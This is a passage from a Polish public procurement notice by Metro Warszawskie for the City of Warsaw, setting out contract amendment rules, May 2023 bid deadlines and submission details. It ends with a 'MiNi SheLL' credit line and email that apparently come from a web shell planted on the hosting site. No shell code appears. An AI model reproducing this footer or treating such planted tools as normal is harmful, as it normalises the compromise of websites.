orzeczeń sądów powszechnych, decyzji administracyjnych i orzeczeń sądów administracyjnych;<br/>7)	zmiany wynikające ze zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia Umowy, wraz ze skutkami takiej zmiany regulacji prawnych;<br/>8)	zmiany Umowy w przypadku faktycznie poniesionej przez Wykonawcę i udokumentowanej szkody – z winy Zamawiającego oraz z powodu zmiany terminu wykonania Przedmiotu Umowy;<br/>9)	zmiany z powodu wystąpienia siły wyższej (dotyczące w szczególności terminów wykonania Przedmiotu Umowy).<br/>2.	Definicja „siły wyższej” dostępna w §10. Ust. 2 Wzoru Umowy.<br/>3.	Zamawiający dopuszcza również wprowadzenie zmian postanowień zawartej Umowy <br/>w przypadku wystąpienia okoliczności, o których mowa w art. 455 ust. 1 pkt 2) – 4) oraz art. 455 ust. 2 ustawy Pzp.<br/>4.	Zgodnie z art. 436 pkt 4) lit. b) ustawy Pzp ustala się zasady wprowadzenia odpowiednich zmian wysokości wynagrodzenia należnego Wykonawcy – konkretne sytuacje opisano w §10. Ust. 4 Wzoru Umowy.<br/>5.	W przypadku wystąpienia którejkolwiek z okoliczności stanowiących podstawę zmiany Umowy, <br/>o których mowa w §10. Ust. 6 Wzoru Umowy, Wykonawca zobowiązany będzie wystąpić do Zamawiającego z wnioskiem o zmianę Umowy wraz z opinią w sprawie skutków tejże zmiany.<br/>6.	Strony, zgodnie z art. 439 ustawy Pzp, ustalają niżej określone zasady wprowadzania zmian wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia.<br/>7.	Zmiany, o których mowa w §10. ust. 6 i 8 Wzoru Umowy, mogą zostać wprowadzone jedynie w przypadku, gdy Strony Umowy (Zamawiający i Wykonawca) zgodnie uznają, że zaszły wskazane w ust. 6 i 8 okoliczności.<br/>8.	Warunkiem wprowadzenia zmian zawartej Umowy jest sporządzenie podpisanego przez Strony protokołu konieczności.<br/>9.	Wykonawca nie będzie uprawniony a Zamawiający zobowiązany do wprowadzenia jakiejkolwiek zmiany do Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-15 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy Zakupowej Zamawiającego dostępnej pod adresem: https://postepowania.metro.waw.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-15 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiającym w niniejszym postępowaniu jest Miasto Stołeczne Warszawa, reprezentowane przez Zarząd Transportu Miejskiego w Warszawie, w imieniu i na rzecz którego, na podstawie: Aktu założycielskiego spółki Metro Warszawskie spółka z ograniczoną odpowiedzialnością z siedzibą w Warszawie, w szczególności § 39-40; Umowy zawartej z m. st. Warszawa z dnia 23.01.2003 r. nr 3653/EH/03 o inwestorstwo zastępcze; pełnomocnictwa z dnia 10.01.2014 r. o znakach ZTM-NPZ-OGA-0141-2-1-14, działa Metro Warszawskie Sp. z o. o.<br/>2. Powody niedokonania podziału zamówienia na części: art. 91 ust. 2 ustawy Pzp: Z uwagi na charakter Przedmiotu Zamówienia, tj. wykonanie jednorodnego i integralnego dzieła, brak jest możliwości podziału zamówienia na części.

Creat By MiNi SheLL
Email: jattceo@gmail.com